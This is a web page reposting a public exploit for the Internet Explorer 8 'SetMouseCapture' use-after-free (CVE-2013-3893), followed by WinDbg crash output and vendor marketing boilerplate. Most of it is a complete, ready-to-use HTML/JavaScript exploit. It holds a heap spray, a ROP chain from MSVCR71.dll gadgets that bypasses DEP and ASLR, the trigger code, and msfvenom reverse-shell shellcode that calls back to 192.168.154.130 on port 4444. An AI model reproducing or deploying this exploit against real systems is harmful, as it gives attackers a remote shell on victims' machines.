microsoft internet explorer 8 setmousecapture use after free

▸▸▸ Exploit & Vulnerability >>   local exploit & windows vulnerability




Online Vulnerability Scanner Tools
microsoft internet explorer 8 setmousecapture use after free Code Code... 
				
# Exploit Title: Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free
# Date: 15/05/2021
# CVE : CVE-2013-3893
# PoC: https://github.com/travelworld/cve_2013_3893_trigger.html/blob/gh-pages/params.json
# Exploit Author: SlidingWindow
# Vendor Advisory: https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2013/2887505?redirectedfrom=MSDN
# Tested on: Microsoft Internet Explorer 8 (version: 8.0.7601.17514) on Windows 7 SP1 (Version 6.1 Build 7601 SP1)
# Bypasses: DEP, ASLR using MSVCR71.DLL
# Thanks to @corelanc0d3r for awesome Heap Exploitation Training and @offsectraining for OSCP training

<html>
<script>
var spraychunks = new Array();

  // Use BSTR spray since DEPS spray didn't work here
  function heapspray()
  {
    var ropchain = unescape("%u122c%u0c0c"); //EAX now points here. EDX = [EAX+0x70]. So call EDX will take a forward jump to stack-heap flip: 0x7c348b05 :  # XCHG EAX,ESP # RETN 

    //ESP points here after stack-heap flip. jump over padding+stack-heap flip into ROP chain.
    ropchain += unescape("%u6bd5%u7c36");  //0x7c366bd5 :  # ADD ESP,100 # RETN    ** [MSVCR71.dll] **   |   {PAGE_EXECUTE_READ}
    
    //Some padding
    ropchain += unescape("%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565");
    
    //ESP will point to 0x0c0c122c after stack-heap flip.
    ropchain += unescape("%u8b05%u7c34"); //0x7c348b05 :  # XCHG EAX,ESP # RETN    ** [MSVCR71.dll] **   |   {PAGE_EXECUTE_READ}
    
    //More padding for ADD ESP, 100
    ropchain += unescape("%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565");
    
    //rop chain generated with mona.py - www.corelan.be
    //ropchain needed a little fix

    ropchain += unescape(
      "" + // #[---INFO:gadgets_to_set_ebp:---] : 
      "%u1cab%u7c35" + // 0x7c351cab : ,# POP EBP # RETN [MSVCR71.dll] 
      "%u1cab%u7c35" + // 0x7c351cab : ,# skip 4 bytes [MSVCR71.dll]
      "" + // #[---INFO:gadgets_to_set_ebx:---] : 
      "%u728e%u7c34" + // 0x7c34728e : ,# POP EAX # RETN [MSVCR71.dll] 
      "%ufdff%uffff" + // 0xfffffdff : ,# Value to negate, will become 0x00000201
      "%u684b%u7c36" + // 0x7c36684b : ,# NEG EAX # RETN [MSVCR71.dll] 
      "%u1695%u7c37" + // 0x7c371695 : ,# POP EBX # RETN [MSVCR71.dll] 
      "%uffff%uffff" + // 0xffffffff : ,#
      "%u5255%u7c34" + // 0x7c345255 : ,# INC EBX # FPATAN # RETN [MSVCR71.dll] 
      "%u2174%u7c35" + // 0x7c352174 : ,# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [MSVCR71.dll] 
      "" + // #[---INFO:gadgets_to_set_edx:---] : 
      "%u5937%u7c34" + // 0x7c345937 : ,# POP EDX # RETN [MSVCR71.dll] 
      "%uffc0%uffff" + // 0xffffffc0 : ,# Value to negate, will become 0x00000040
      "%u1eb1%u7c35" + // 0x7c351eb1 : ,# NEG EDX # RETN [MSVCR71.dll] 
      "" + // #[---INFO:gadgets_to_set_ecx:---] : 
      "%u0c81%u7c36" + // 0x7c360c81 : ,# POP ECX # RETN [MSVCR71.dll] 
      "%ucd8c%u7c38" + // 0x7c38cd8c : ,# &Writable location [MSVCR71.dll]
      "" + // #[---INFO:gadgets_to_set_edi:---] : 
      "%u4648%u7c35" + // 0x7c354648 : ,# POP EDI # RETN [MSVCR71.dll] 
      "%ud202%u7c34" + // 0x7c34d202 : ,# RETN (ROP NOP) [MSVCR71.dll]
      "" + // #[---INFO:gadgets_to_set_esi:---] : 
      "%u50dd%u7c36" + // 0x7c3650dd : ,# POP ESI # RETN [MSVCR71.dll] 
      "%u15a2%u7c34" + // 0x7c3415a2 : ,# JMP [EAX] [MSVCR71.dll]
      "%u5194%u7c34" + // 0x7c345194 : ,# POP EAX # RETN [MSVCR71.dll] 
      // "%ua140%u7c37" + // 0x7c37a140 : ,# ptr to &VirtualProtect() [IAT MSVCR71.dll]
      // "%ua051%u7c37" +  // 7c37a051 + 0xEF should become  0x7c37a140, which is a pointer to &VirtualProtect()
      // Because next instruction adds 0xEF into AL.
      "%ua151%u7c37"  + // 7c37a151 + + 0xEF should become  0x7c37a140, which is a pointer to &VirtualProtect()
      // Because next instruction adds 0xEF into AL.
      "" + // #[---INFO:pushad:---] : 
      "%u8c81%u7c37" + // 0x7c378c81 : ,# PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll] 
      "" + // #[---INFO:extras:---] : 
      "%u5c30%u7c34" + // 0x7c345c30 : ,# ptr to 'push esp # ret ' [MSVCR71.dll]
      ""); //  : 

    
    // msfvenom -p windows/shell_reverse_tcp -a x86 lhost=192.168.154.130 lport=4444 -b '\x00' -f js_le
    // First few bytes, %uc481%ufa24%uffff (which is \x81\xc4\x24\xfa\xff\xff # add esp,-1500) move ESP away from EIP to avoid GetPC() routine from corrupting our shellcode

    var shellcode = unescape("%uc481%ufa24%uffff%uccd9%u74d9%uf424%ube5d%uba98%ue3da%uc931%u52b1%u7531%u8317%u04c5%ued03%u38a9%uf116%u3e26%u09d9%u5fb7%uec53%u5f86%u6507%u6fb8%u2b43%u1b35%udf01%u69ce%ud08e%uc767%udfe8%u7478%u7ec8%u87fb%ua01d%u47c2%ua150%ub503%uf399%ub1dc%ue30c%u8f69%u888c%u0122%u6d95%u20f2%u20b4%u7a88%uc316%uf75d%udb1f%u3282%u50e9%uc870%ub0e8%u3148%ufd46%uc064%u3a96%u3b42%u32ed%uc6b0%u81f6%u1cca%u1172%ud66c%ufd24%u3b8c%u76b2%uf082%ud0b0%u0787%u6b14%u8cb3%ubb9b%ud635%u1fbf%u8c1d%u06de%u63fb%u58de%udca4%u137a%u0849%u7ef7%ufd06%u803a%u69d6%uf34c%u36e4%u9be6%ube44%u5c20%u95aa%uf295%u1655%udbe6%u4291%u73b6%ueb33%u835d%u3ebc%ud3f1%u9112%u83b2%u41d2%uc95b%ubedc%uf27b%ud736%u0916%u18d1%u8b4e%uf1a3%uab8d%u5db2%u4d1b%u4dde%uc64d%uf777%u9cd4%uf8e6%ud9c2%u7229%u1ee1%u73e7%u0c8c%u7390%u6edb%u8b37%u06f1%u1edb%ud69e%u0292%u8109%uf5f3%u4740%uacee%u75fa%u29f3%u3dc4%u8a28%ubccb%ub6bd%uaeef%u367b%u9ab4%u61d3%u7462%udb92%u2ec4%ub74c%ua68e%ufb09%ub010%ud615%u5ce6%u8fa7%u63be%u5808%u1c37%uf874%uf7b8%u083c%u55f3%u8114%u0c5a%ucc24%ufb5c%ue96b%u09de%u0e14%u78fe%u4a11%u91b8%uc36b%u952d%ue4d8%u4167"); 

    var junk = unescape("%u2020%u2020");  
    while (junk.length < 0x4000) junk += junk;
    offset = 0x204/2 ; //0c0c1228
    var junk_front = junk.substring(0,offset);
    var junk_end = junk.substring(0,0x800 - junk_front.length - ropchain.length - shellcode.length)
    var smallblock = junk_front + ropchain + shellcode + junk_end;

    
    var largeblock = "";
    while (largeblock.length < 0x80000) { largeblock = largeblock + smallblock; }

    // make allocations
    for (i = 0; i < 0x450; i++) { spraychunks[i] = largeblock.substring(0, (0x7fb00-6)/2);  }
    
  }
  
  function alloc(nr_alloc){
    for (var i=0; i < nr_alloc; i++){
      divobj = document.createElement('div');
      // Allocate 0x25 (37 decimal) bytes.  Vulnerable object size = 0x4c bytes
      divobj.className = "\u1228\u0c0c\u4141\u4141\u4242\u4242\u4343\u4343\u4444\u4444\u4545\u4545\u4646\u4646" + 
                       "\u4747\u4747\u4848\u4949\u4949\u5050\u5050\u5151\u5151\u5252\u5252\u5353\u5353\u5454" +
                       "\u5454\u5555\u5555\u5656\u5656\u5757\u5757\u5858\u5858";
    }
  }

  heapspray();
  
  function trigger()
  {
    var id_0 = document.createElement("sup");
    var id_1 = document.createElement("audio");

    heapspray();
    document.body.appendChild(id_0);
    document.body.appendChild(id_1);
    id_1.applyElement(id_0);

    id_0.onlosecapture=function(e) {
    //Vulnerable Object is freed here
    document.write("");
    
    //Replace/Reclaim the freed object here. 
    //Object size is 0x4c
    alloc(0x20);
      
    }

    id_0['outerText']="";
    id_0.setCapture();
    id_1.setCapture();
  }

  window.onload = function() {
    trigger();
  }
 
</script>
</html>

<!-- Debug: Taking a different code path for this exploit

First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000003 ebx=00000100 ecx=40404040 edx=00000001 esi=0089c098 edi=00000000
eip=7467b68d esp=0301c34c ebp=0301c360 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
mshtml!CElement::Doc:
7467b68d 8b01            mov     eax,dword ptr [ecx]  ds:002b:40404040=????????

0:005> u eip
mshtml!CElement::Doc:
7467b68d 8b01            mov     eax,dword ptr [ecx]
7467b68f 8b5070          mov     edx,dword ptr [eax+70h]
7467b692 ffd2            call    edx
7467b694 8b400c          mov     eax,dword ptr [eax+0Ch]
7467b697 c3              ret
7467b698 90              nop
7467b699 90              nop
7467b69a 90              nop

0:005> ub eip
mshtml!CElement::SecurityContext+0x22:
7467b681 8b01            mov     eax,dword ptr [ecx]
7467b683 8b5070          mov     edx,dword ptr [eax+70h]
7467b686 ffe2            jmp     edx
7467b688 90              nop
7467b689 90              nop
7467b68a 90              nop
7467b68b 90              nop
7467b68c 90              nop

Microsoft internet explorer 8 setmousecapture use after free Vulnerability / Exploit Source : Microsoft internet explorer 8 setmousecapture use after free



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.